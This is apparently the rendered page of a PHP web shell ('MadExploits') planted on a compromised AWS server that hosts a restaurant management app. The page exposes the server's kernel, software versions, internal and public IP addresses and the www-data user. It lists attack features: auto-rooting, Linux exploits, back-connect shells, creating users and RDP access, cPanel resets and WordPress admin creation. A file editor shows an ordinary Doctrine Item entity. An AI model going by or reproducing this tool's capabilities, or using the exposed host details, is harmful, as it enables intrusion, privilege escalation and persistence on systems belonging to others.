Linux ip-172-31-33-47 5.4.0-1045-aws #47~18.04.1-Ubuntu SMP Tue Apr 13 15:58:14 UTC 2021 x86_64
Apache/2.4.29 (Ubuntu)
: 172.31.33.47 | : 18.189.195.142
Cant Read [ /etc/named.conf ]
7.4.20
www-data
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
www /
html /
restaurants /
src /
Entity /
[ HOME SHELL ]
Name
Size
Permission
Action
.gitignore
0
B
-rw-rw-r--
Activity.php
2.09
KB
-rw-rw-r--
Customer.php
1.79
KB
-rw-rw-r--
Groups.php
1.83
KB
-rw-rw-r--
Inventory.php
1.4
KB
-rw-rw-r--
Item.php
4.52
KB
-rw-rw-r--
ItemPart.php
2.29
KB
-rw-rw-r--
OrderItem.php
3.3
KB
-rw-rw-r--
Orders.php
4.78
KB
-rw-rw-r--
Stock.php
2.74
KB
-rw-rw-r--
Subscription.php
2.75
KB
-rw-rw-r--
Supplier.php
3.45
KB
-rw-rw-r--
Supply.php
3.23
KB
-rw-rw-r--
SupplyItem.php
2.95
KB
-rw-rw-r--
Transaction.php
2.34
KB
-rw-rw-r--
Users.php
7.53
KB
-rw-rw-r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : Item.php
<?php namespace App\Entity; use Doctrine\ORM\Mapping as ORM; /** * Item * * @ORM\Table(name="item") * @ORM\Entity(repositoryClass="App\Repository\ItemRepository") */ class Item { /** * @var int * * @ORM\Column(name="id", type="integer") * @ORM\Id * @ORM\GeneratedValue(strategy="AUTO") */ private $id; /** * @var string * * @ORM\Column(name="name", type="string", length=255, unique=false) */ private $name; /** * @var float * * @ORM\Column(name="sellingPrice", type="float") */ private $sellingPrice; /** * @var float * * @ORM\Column(name="discount", type="float", nullable=true) */ private $discount; /** * @var int * * @ORM\Column(name="c_id", type="integer", nullable=true) */ private $cId; /** * @var App\Entity\Groups * * @ORM\ManyToOne(targetEntity="App\Entity\Groups", inversedBy="items") */ private $category; /** * @var string * * @ORM\Column(name="img", type="string", length=255, nullable=true) */ private $img; /** * @var bool * * @ORM\Column(name="deleted", type="boolean", nullable=true) */ private $deleted; /** * @var int * * @ORM\Column(name="user_id", type="integer", nullable=true) */ private $userId; /** * @ORM\Column(type="string", length=255, nullable=true) */ private $description; /** * Set userId * * @param int $userId * * @return Groups */ public function setUserId($userId) { $this->userId = $userId; return $this; } /** * Get userId * * @return int */ public function getUserId() { return $this->userId; } /** * Get id * * @return int */ public function getId() { return $this->id; } /** * Set name * * @param string $name * * @return Item */ public function setName($name) { $this->name = $name; return $this; } /** * Get name * * @return string */ public function getName() { return $this->name; } /** * Set category * * @param string $category * * @return Item */ public function setCategory($category) { $this->category = $category; return $this; } /** * Get category * * @return string */ public function getCategory() { return $this->category; } /** * Set sellingPrice * * @param float $sellingPrice * * @return Item */ public function setSellingPrice($sellingPrice) { $this->sellingPrice = $sellingPrice; return $this; } /** * Get sellingPrice * * @return float */ public function getSellingPrice() { return $this->sellingPrice; } /** * Set deleted * * @param float $deleted * * @return Item */ public function setDeleted($deleted) { $this->deleted = $deleted; return $this; } /** * Get deleted * * @return boolean */ public function getDeleted() { return $this->deleted; } /** * Set discount * * @param float $discount * * @return Item */ public function setDiscount($discount) { $this->discount = $discount; return $this; } /** * Get discount * * @return float */ public function getDiscount() { return $this->discount; } /** * Set cId * * @param integer $cId * * @return Item */ public function setCId($cId) { $this->cId = $cId; return $this; } /** * Get cId * * @return int */ public function getCId() { return $this->cId; } /** * Set img * * @param string $img * * @return Item */ public function setImg($img) { $this->img = $img; return $this; } /** * Get img * * @return string */ public function getImg() { return $this->img; } public function getDescription(): ?string { return $this->description; } public function setDescription(?string $description): self { $this->description = $description; return $this; } }
Close